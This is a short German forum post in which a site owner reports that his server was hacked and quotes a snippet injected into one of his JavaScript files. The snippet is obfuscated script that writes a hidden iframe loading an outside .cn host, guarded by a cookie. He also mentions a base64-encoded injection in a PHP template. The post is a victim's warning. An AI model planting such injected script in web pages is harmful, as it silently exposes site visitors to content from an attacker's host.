Muss aber nicht zwingend WP Schuld sein.
Mein Server wurde auch grad angegriffen und auf verschiedenen Seiten (auch welche ohne WP) haben Zusatzcode bekommen. Scheint auch kein Bot zu sein, dafür ist es zu speziell eingebaut.
z.B. wurde eine *.js Datei um folgenden Code erweitert:
Code
if (document.cookie.search("kxeo=1") == -1) {
document.write("<i"+"fr"+"am"+"e sr"+"c=h"+"ttp://g"+"c"+"ounter.cn s"+"tyle"+"=disp"+"lay:none><"+"/i"+"fr"+"ame>");
document.cookie = "kxeo=1;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
(Achtung!!! Code auch nicht mal zum Spass ausprobieren!!!)
An anderer Stelle wurde eine Datei meines eigenen Templatesystems mit einem PHP [FONT="]base64_decode() JavaScript versaut.
Wird ne laange Nacht heute!
[/FONT]